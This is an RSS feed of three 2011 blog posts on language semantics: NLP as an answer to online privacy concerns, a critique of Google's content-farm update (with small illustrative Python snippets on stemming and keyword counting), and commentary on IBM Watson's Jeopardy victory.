<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title></title>
	<atom:link href="http://languagesemantics.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://languagesemantics.com</link>
	<description></description>
	<lastBuildDate>Tue, 24 May 2011 07:58:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>Linguistic context will solve the Privacy Issues</title>
		<link>http://languagesemantics.com/linguistic-context-will-solve-the-privacy-issues/</link>
		<comments>http://languagesemantics.com/linguistic-context-will-solve-the-privacy-issues/#comments</comments>
		<pubDate>Thu, 19 May 2011 14:42:51 +0000</pubDate>
		<dc:creator>Abhishek Mehta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Ideas]]></category>
		<category><![CDATA[Internet Privacy]]></category>
		<category><![CDATA[NLP]]></category>

		<guid isPermaLink="false">http://languagesemantics.com/?p=532</guid>
		<description><![CDATA[The debate on Internet “privacy issues” will reach alarming levels in the coming months. With the biggest “Web 2.0” companies lining up for IPOs, the discussion ]]></description>
			<content:encoded><![CDATA[<p><a href="http://languagesemantics.com/wp-content/uploads/2011/05/Privacy_trapped.jpg"><img class="size-full wp-image-538 alignright" title="Privacy_trapped" src="http://languagesemantics.com/wp-content/uploads/2011/05/Privacy_trapped.jpg" alt="" width="280" height="209" /></a></p>
<p>The debate on Internet “privacy issues” will reach alarming levels in the coming months. With the biggest “Web 2.0” companies lining up for IPOs, the discussion is even more relevant: privacy has deep implications for their overstretched valuations and future direction.</p>
<p>Legislation on how to handle user privacy online is pending in many US states. A bill such as the one in California (<a title="Report" href="http://info.sen.ca.gov/pub/11-12/bill/sen/sb_0201-0250/sb_242_bill_20110502_amended_sen_v98.pdf" target="_blank">Social Networking Privacy Act (SB 242)</a>) will, if passed, have a long-lasting impact on the modus operandi of social media websites. The EU Council is also suggesting that “illicit websites” be blocked from European cyberspace. Tactically speaking, “illicit websites” will in future be rephrased as “illicit behavior”, allowing freedom of speech but putting a cap on “privacy issues”.</p>
<p>Here is the crux of the problem: companies need to know more about you to sell more to you. Relevant advertisements, prospective clientele, growth patterns, industry predictions, network growth: in a nutshell, all of it serves to make more money for investors. Making a profit is a great thing, and so is Internet privacy. There is no doubt that responsibility lies with governments, ICANN and social media companies, but a big chunk of this problem can be resolved by using “thinking software” and natural language semantics.</p>
<h3>What they miss: Natural Language Semantics</h3>
<p>The reason companies need netizens' shopping cart details, private networks, website visits and drop-down box selections is that they do not understand what individuals write about themselves. Companies cannot make sense of the descriptive paragraphs, tweets and updates that netizens write, but they certainly understand what netizens select from a list.</p>
<p>Content written by netizens on social networks, and the content they like, has conceptual relevance. It indirectly tells a lot about their intensity, mood and needs. Using this information is not just legal, but also smart. When someone writes or tweets “I am going to watch a movie this weekend”, it makes more sense to sell her movie tickets than to sell them to someone whose profile says:</p>
<p>DO YOU LIKE MOVIES – Select &#8211; “YES/NO”</p>
<p>Social networks ask for and store a lot of personal information about their users. One major privacy concern in the social networking fraternity is the sharing of personal information under an “I Agree” or user licensing clause. Sampling users based on their “written snippets”, without sharing entrusted information, will reduce the privacy outcry. The company holding the information is liable for what the user entrusts to it, but the user is responsible for what he writes on the Internet.</p>
<p>Machine understanding of English (or any other language) text is essential to make such a model successful. The technology is evolving, but it is nowhere near human intelligence. Lobbyists for and against the “<a title="Online Privacy made social" href="http://abhishekmehta.com/online-privacy-how-we-made-it-social/" target="_blank">Privacy Issues</a>” should lobby for commitments and investments from governments and social media companies in the fields of natural language processing and artificial intelligence. Natural language semantics is an icebreaker between those who want privacy and those who want a return on their investments.</p>
<h3>Courtesy:</h3>
<p><a class="blogentry" href="http://www.freedigitalphotos.net" target="_blank">Free Stock Photos</a> for websites &#8211; FreeDigitalPhotos.net</p>
]]></content:encoded>
			<wfw:commentRss>http://languagesemantics.com/linguistic-context-will-solve-the-privacy-issues/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google’s Content Farm updates : or leaking patches</title>
		<link>http://languagesemantics.com/google%e2%80%99s-content-farm-updates-or-leaking-patches/</link>
		<comments>http://languagesemantics.com/google%e2%80%99s-content-farm-updates-or-leaking-patches/#comments</comments>
		<pubDate>Thu, 03 Mar 2011 13:50:10 +0000</pubDate>
		<dc:creator>Abhishek Mehta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Content Farms]]></category>
		<category><![CDATA[Google]]></category>

		<guid isPermaLink="false">http://languagesemantics.com/?p=64</guid>
		<description><![CDATA[The latest search algorithm updates from Google are expected to affect about 11.8% of search queries. The buzz is that content farms such as “eHow”, “ezinearticles” and the like ]]></description>
			<content:encoded><![CDATA[<p><a href="http://languagesemantics.com/wp-content/uploads/2011/05/Content_Farms.jpg"><img class="alignright size-full wp-image-527" title="Content Farms" src="http://languagesemantics.com/wp-content/uploads/2011/05/Content_Farms.jpg" alt="Content Farms" width="200"/></a>The latest search algorithm updates from Google are expected to affect about 11.8% of search queries. The <a title="Ref." href="http://www.readwriteweb.com/archives/has_googles_new_algorithm_really_cleaned_up_search.php" target="_blank">buzz</a> is that content farms such as “eHow”, “ezinearticles” and the like are the targets. The idea is to downgrade the relevance of content farms in the overall search ranking system. Many content farms are considered to have low-grade content that is either bought (<a title="Crowdsourcing How?" href="http://abhishekmehta.com/crowdsourcing-what-when-where-and-how/" target="_self">crowdsourcing platforms</a>), plagiarized or aggregated.</p>
<h3>Content farms: Troublemakers</h3>
<p>There are some genuine concerns about fair search: content farms apply SEO techniques to reach the top of the search rankings and infest the results with not-so-valuable content. This is a double-edged sword. First, web searchers waste time wading through these results; second, losing advertising revenue to low-value websites deters future advertisers.</p>
<p>Content farms also increase overhead for Google. These not-so-valuable results have to be indexed, re-indexed, stored, managed, searched and presented.</p>
<p>The hailstorm of search engine launches in recent years has raised the bar for the online search community; netizens expect better results, if not quicker ones. <a title="Celebrating Watson" href="http://abhishekmehta.com/celebrating-watson-as-an-innovation/" target="_self">In the era of IBM Watsons</a>, Google can’t let content farms spoil the party.</p>
<h3>Error in judgment:</h3>
<p>A noble idea without noble karma leads to nothing. At first glance, the idea of attacking content farms appears bright and logical. But the way Google is tackling this problem is not going to make any difference in the long run.</p>
<p>Google does not have the <strong>semantics</strong> to pick valuable content over non-valuable content. Stemming is the furthest stretch of linguistics inside Google search, and no stemming algorithm can differentiate a “content farm” from the “content of the farm” (Artificially Intelligent).</p>
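<p>A minimal sketch of that point, in Python. The stop-word list and the suffix stripper are toy assumptions of mine, not Google’s actual pipeline; they only show how stop-word removal plus stemming can collapse two phrases with different meanings into the same tokens.</p>

```python
import re

# Hypothetical, deliberately tiny stop-word list and suffix list;
# a real search pipeline is far richer than this.
STOP_WORDS = {"of", "the", "a", "an"}
SUFFIXES = ("ing", "es", "s")


def stem(word):
    """Strip one common suffix, keeping at least three letters."""
    for suffix in SUFFIXES:
        if word.endswith(suffix) and len(word) - len(suffix) >= 3:
            return word[: -len(suffix)]
    return word


def normalize(phrase):
    """Lowercase the phrase, drop stop words and stem what is left."""
    words = re.findall(r"[a-z]+", phrase.lower())
    return [stem(w) for w in words if w not in STOP_WORDS]


# Both phrases reduce to the same token list.
print(normalize("content farms"))
print(normalize("content of the farm"))
```

<p>Once both phrases look identical, nothing downstream can tell the business model from the barnyard without extra context.</p>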
<p>Google runs on keyword frequency analysis, not on contextual understanding. Content is judged important relative to some input, say keywords; the same content can be more important for one set of keywords than for another. In the absence of semantic algorithms, reducing the relevance of web results by applying some pre-programmed algorithm to domain names is against the free nature of the Internet. To kill a bad fish, there is no need to poison the water source.</p>
<p>Google has no way to tell the content of one website from another, except by statistical proximity. Remember the movie Flubber? Content farms are flubbers; predicting their shape is not possible. Google needs to judge their semantic overlap against the knowledge they represent. Otherwise, with new domain names sold at less than a dollar a month, the Flubber can simply take a new shape.</p>
<p>Google searches for characters; it can neither understand what you are typing nor make sense of what a web page is conveying. Content farms have thrived on this weakness and on SEO hormones. If the content farms decide to simply reverse the order of their low-value sentences, they will succeed in fooling statistical algorithmic changes.</p>
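<p>To make the reordering argument concrete, here is a small Python sketch. It assumes a pure keyword-frequency (bag-of-words) model, which is how this post characterizes Google, not a description of Google’s real ranking code; the sample text is invented. Such a model ignores order, so shuffling words or whole sentences leaves the profile unchanged.</p>

```python
from collections import Counter


def keyword_counts(text):
    """Bag-of-words profile: word frequencies, with order thrown away."""
    return Counter(text.lower().split())


# Invented sample of low-value, keyword-stuffed text.
original = "cheap tickets buy cheap movie tickets now"
reversed_text = " ".join(reversed(original.split()))

print(reversed_text)
# The two texts read differently but have identical keyword profiles.
print(keyword_counts(original) == keyword_counts(reversed_text))
```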
<p>I have been harsh on Google. But until it starts to apply semantic, syntactic and structural constructs in tandem, nothing is going to change for web searchers. Applying semantics is not easy and cannot happen overnight, so in the meantime I have an extra suggestion.</p>
<h3>One Suggestion:</h3>
<p>I want to point to Google’s <a title="SearchWiki and more" href="http://abhishekmehta.com/tag/searchwiki/" target="_self">SearchWiki</a>, my personal favorite. SearchWiki was Google’s mass-scale, collaborative search effort. It was a way for users to customize and personalize search results. Each web searcher could re-rank, delete, add and comment on every single result (domain) that Google threw at him, and his preferences were applied to all his future searches, old or new.</p>
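<p>The idea can be sketched in a few lines of Python. This is my own hypothetical model of per-user preferences, not SearchWiki’s actual implementation; the class name, its fields and the example domains are all assumptions made for illustration.</p>

```python
from dataclasses import dataclass, field


@dataclass
class UserPreferences:
    """Hypothetical per-user store of promoted and removed domains."""
    promoted: list = field(default_factory=list)
    removed: set = field(default_factory=set)

    def apply(self, results):
        """Drop removed domains, then move promoted ones to the top."""
        kept = [r for r in results if r not in self.removed]
        top = [r for r in self.promoted if r in kept]
        rest = [r for r in kept if r not in top]
        return top + rest


# The same stored preferences are re-applied to every later result list.
prefs = UserPreferences(promoted=["wikipedia.org"], removed={"farm.example"})
print(prefs.apply(["farm.example", "news.example", "wikipedia.org"]))
```

<p>The searcher, not the engine, decides which domains count as a content farm.</p>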
<p>SearchWiki was released on November 20, 2008 and discontinued on March 3, 2010. Google replaced it with two things: Google Stars, and SideWiki for sharing annotations. But they are nothing like SearchWiki.</p>
<p>As a piece of unsolicited advice: let web searchers control the quality of their own search results and domains (until we have semantic capabilities). Let us decide on the content farms (bring back SearchWiki); don’t impose. One person’s pennies can be another’s wealth, so let the content farms live; after all, Wikipedia is also a great content farm.</p>
<h3>Courtesy:</h3>
<p><a class="blogentry" href="http://www.freedigitalphotos.net" target="_blank">Free Stock Photos</a> for websites &#8211; FreeDigitalPhotos.net<br />
<br />
Trackback-&gt; <a href="http://abhishekmehta.com/google%E2%80%99s-content-farm-updates-or-leaking-patches/" target="_blank">Abhishekmehta.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://languagesemantics.com/google%e2%80%99s-content-farm-updates-or-leaking-patches/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Celebrating Watson as an innovation</title>
		<link>http://languagesemantics.com/celebrating-watson-as-an-innovation/</link>
		<comments>http://languagesemantics.com/celebrating-watson-as-an-innovation/#comments</comments>
		<pubDate>Fri, 18 Feb 2011 14:04:31 +0000</pubDate>
		<dc:creator>Abhishek Mehta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[IBM Watson]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Natural Language Semantics]]></category>
		<category><![CDATA[NLP]]></category>

		<guid isPermaLink="false">http://languagesemantics.com/?p=70</guid>
		<description><![CDATA[IBM’s Watson, king of the Jeopardy game, has proven the obvious. On the final day of the game it defeated the all-time best of the ]]></description>
			<content:encoded><![CDATA[<p><a href="http://languagesemantics.com/wp-content/uploads/2011/05/ibm_watson_avatar.jpg"><img src="http://languagesemantics.com/wp-content/uploads/2011/05/ibm_watson_avatar.jpg" alt="" title="ibm_watson_avatar" width="188" height="188" class="alignright size-full wp-image-549" /></a>IBM’s Watson, king of the <a href="http://www.jeopardy.com/" target="_blank">Jeopardy</a> game, has proven the obvious. On the final day of the game it defeated the all-time best Jeopardy players (Ken Jennings and Brad Rutter), winning $77,147. Credit for this victory goes to IBM, Dr. David Ferrucci and his team. It is déjà vu of the match between IBM&#8217;s Deep Blue supercomputer and the reigning World Chess Champion, Garry Kasparov (May 1997).</p>
<p>The “Deep Blue supercomputer” is passé next to IBM’s new innovation. <a title="IBM Watson" href="http://www.ibmwatson.com" target="_blank">Watson</a> is context-aware and artificially intelligent. It can resolve the context and ambiguity of English text, navigate through terabytes of memory and look for the right results.</p>
<p>Did I write that it “looks for” results? Oh, I am sorry, that is a bad phrase; Watson is claimed to mimic the human brain&#8217;s cognitive process through its statistical experience over a knowledge base of “unstructured and structured” content. All of this is done in under 3 seconds using <strong>ninety</strong> “IBM POWER 750” servers, 16 terabytes of memory and 4 terabytes of clustered storage. Its microprocessors and software stack are tuned to address the needs of specific applications (like Jeopardy).</p>
<p>Powerful hardware is combined with amazing algorithms to give high-confidence answers. The capitalist world will not ignore this golden goose. But for the general TV viewer and journalist, “<strong>The Technological Apocalypse</strong>” is approaching; some are concerned that even skilled jobs, such as financial analysis, medical diagnostics and technical support, will go Watson’s way.</p>
<h3>Watson is not an invention, it is an innovation</h3>
<p>Let me reassure you: Watson is here to assist you, not to take over your job. A program that answers “Toronto” in the category “U.S. Cities”, cannot see the thread between Rocky 1, 2 and 3, repeats the wrong answers of its competitors and can only play Jeopardy is not going to replace you yet (and not for a long while). Both the knowledge and the questions are created by humans, and Watson does what it is told to do.</p>
<p>Breathe easy, relax and recite this mantra 5 times: “<strong>Watson is not an invention, it is an innovation</strong>”. Watson is to language semantics what the iPhone was to mobiles. Watson brought various concepts of AI (Artificial Intelligence) and language processing under one patched umbrella. Achieving what Watson just did took the combined effort of machine learning experts; speech, knowledge representation, information retrieval and rule engine engineers; linguists, ontologists, media artists, programmers and tons more. The scope of Watson is confined to a single sentence; it is the scale which deserves a standing ovation.</p>
<h3>Watson Family</h3>
<p>For people in the domains of language semantics or artificial intelligence, Watson is an “<strong>engineering marvel</strong>”, a “<strong>modeling genius</strong>” and a “<strong>marketing success</strong>”. It is the result of hundreds of millions of dollars spent over four years. IBM has the budget for this and others don’t, so IBM can win Jeopardy. That said, it is the winner that counts, not the others.</p>
<p>Keeping aside the amazing publicity for IBM and the chart-topping ratings for Jeopardy, Watson is a big success for the whole language processing fraternity. We have struggled for years to make people understand the difference between “<a href="http://abhishekmehta.com/quest-for-perfect-search-engine-part1/" target="_self">Google and Semantic</a>” search. I am glad the world is trying to understand (by itself) “How and What Watson just did?” <a href="http://abhishekmehta.com/web-2-0-%E2%80%93-bubble-bubble-go-away/" target="_self">Venture capitalists are bubbling up the Web 2.0</a>; I believe the Watson phenomenon will attract them to the technology which is the future of mankind.</p>
<h3>Watson &amp; the Future</h3>
<p>Watson is fine-tuned to play the game of Jeopardy; it understands the rules of the game. It can take risks. But Watson is no thinking machine. It is a specialized machine built to play Jeopardy: it can resolve the context of a short sentence or fact and then formulate an answer (using its deep, fast knowledge base).</p>
<p>In the practical world, Watson walks a very thin line. Its humongous infrastructure cannot be supported even by the mega businesses of today. It is fit to be a worldwide “repository/ service/ cloud” for question answering. But real-world problems and solutions are not one-liner semantics. They are complex &amp; infested with human traits of culture, intelligence, voice, taste, touch, vision, smell and emotions.</p>
<p>As a search engine, Watson stands face to face with Google search, which is kind of dumb but fast, popular and the market leader. Making a dent in the search engine market is not an option for Watson; it is too expensive and too slow for this area.</p>
<p>I am sure the creators of Watson have some interesting business proposition in mind. Those who ride an elephant have to feed him too.</p>
<p style="text-align: center;">&#8212;</p>
<p>Trackback-&gt; <a href="http://abhishekmehta.com/web-2-0-–-bubble-bubble-go-away/" target="_blank">Abhishekmehta.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://languagesemantics.com/celebrating-watson-as-an-innovation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
